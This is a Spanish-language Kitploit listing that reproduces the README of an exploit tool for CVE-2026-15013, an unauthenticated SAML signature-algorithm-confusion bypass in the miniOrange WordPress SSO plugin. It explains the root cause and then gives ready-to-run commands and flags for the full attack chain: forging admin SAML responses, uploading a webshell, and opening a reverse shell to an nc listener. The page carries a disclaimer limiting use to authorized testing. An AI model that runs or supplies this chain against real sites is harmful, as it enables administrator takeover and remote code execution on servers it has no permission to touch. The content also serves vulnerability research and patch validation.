Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2026-15013 — Exploit para CVE-2026-15013: bypass de autenticación SAML no autenticado mediante confusión de algoritmos. Forja respuestas SAML para obtener acceso de administrador e implementar webshell/reverse shell. Para pruebas autorizadas. | Kitploit
Herramientas/GitHubGitHub/zer0dayf/cve-2026-15013
Autenticación y AutorizaciónEscalada de PrivilegiosGeneración de PayloadsExplotación de Aplicaciones WebPost-ExplotaciónSeguridad WebPruebas de PenetraciónRed TeamingHerramienta de Acceso Remoto
GitHubzer0dayf/cve-2026-15013

CVE-2026-15013

Exploit para CVE-2026-15013: bypass de autenticación SAML no autenticado mediante confusión de algoritmos. Forja respuestas SAML para obtener acceso de administrador e implementar webshell/reverse shell. Para pruebas autorizadas.

1hace 24 díasAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir
Ver Repositorio

CVE-2026-15013 — miniOrange SAML SSO <= 5.4.3 Bypass de Autenticación (PoC)

Prueba de concepto para CVE-2026-15013: bypass de autenticación no autenticado mediante confusión de algoritmo de firma SAML (HMAC-SHA1) en el plugin de WordPress SAML Single Sign On – SSO Login de miniOrange (versiones hasta la 5.4.3 inclusive).

Solo pruebas autorizadas. Utilice este código únicamente en sistemas de su propiedad o sobre los que tenga permiso explícito para realizar pruebas. El acceso no autorizado a sistemas informáticos es ilegal.

Créditos

Rol
Descubridor de la vulnerabilidadlhking (acreditado en el registro CVE)
CVE / CNAWordfence
Este repositorioReproducción de laboratorio independiente / automatización del PoC (no el descubrimiento original)

Registro CVE: https://www.cve.org/CVERecord?id=CVE-2026-15013

Causa raíz

Mo_SAML_Utilities::mo_saml_cast_key() confía en el algoritmo SignatureMethod del SAMLResponse controlado por el atacante. Cuando se establece en HMAC-SHA1, el plugin reformatea la clave pública RSA del IdP como un secreto compartido HMAC y verifica la firma con ella. Cualquiera que pueda leer el certificado del IdP (a menudo metadatos públicos) puede falsificar una aserción válida para cualquier usuario existente de WordPress, incluidos los administradores.

Corregido en 5.4.4+ (algoritmos inseguros / HMAC rechazado).

CVSS

9.8 CRÍTICO — CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

Requisitos

  • Python 3.10+
  • CLI openssl (para el certificado a clave pública)
  • Acceso de red al sitio WordPress objetivo y, para la obtención automática de la clave, al descriptor SAML del IdP

Instalar dependencias:

root@kitploit:~
pip install -r requirements.txt

Uso

Cadena completa (enumeración, login HMAC, admin, webshell):

root@kitploit:~
python3 exploit.py -u https://TARGET.example

Shell inversa opcional (iniciar listener primero: nc -lvnp 4444):

root@kitploit:~
python3 exploit.py -u https://TARGET.example --lhost YOUR_IP --lport 4444

Solo login (sin shell):

root@kitploit:~
python3 exploit.py -u https://TARGET.example --no-shell

Anulaciones manuales:

root@kitploit:~
python3 exploit.py -u https://TARGET.example \
  --issuer https://idp.example/realms/xxx \
  --nameid admin \
  -k ./idp-pubkey.pem

Argumentos

Flujo

  1. Detectar WordPress y la versión del plugin (debe ser <= 5.4.3)
  2. Descubrir ACS, entityID del SP, emisor del IdP
  3. Obtener el certificado de firma del IdP (metadatos) y derivar la clave pública PEM (secreto HMAC)
  4. Enumerar usuarios de WordPress
  5. Forjar un SAMLResponse firmado con HMAC-SHA1 para cada usuario candidato
  6. Seleccionar la cuenta con install_plugins (admin)
  7. Subir el plugin webshell (exp/shell.php?c=id)
  8. Shell inversa opcional mediante --lhost

Descargo de responsabilidad

Este proyecto es solo para fines educativos y de investigación de seguridad autorizada. Los autores y colaboradores no son responsables del uso indebido. Obtenga siempre permiso por escrito antes de probar sistemas de terceros. La vulnerabilidad original fue reportada mediante divulgación responsable; este repositorio solo demuestra la reproducción para aprendizaje y validación defensiva.

Referencias

  • https://www.cve.org/CVERecord?id=CVE-2026-15013
  • https://www.wordfence.com/threat-intel/vulnerabilities/id/ee95092d-6351-4612-872d-284165bc1201?source=cve
  • Corrección del plugin: miniOrange SAML 5.4.4+

Licencia

Para uso en investigación. Sin garantía.

Descargar herramienta
FlagDescripción
-u, --urlURL base de WordPress (obligatorio)
-k, --hmac-keyArchivo de clave pública o certificado PEM; si está vacío, se obtiene de los metadatos del IdP
--issuerAnular el emisor del IdP
--acsAnular la URL de ACS
--nameidForzar un nombre de usuario específico de WordPress
--lhost / --lportCallback de shell inversa (puerto predeterminado 4444)
--no-shellDetenerse tras la sesión de administrador
--no-reverseSubir la shell pero no activar la reversa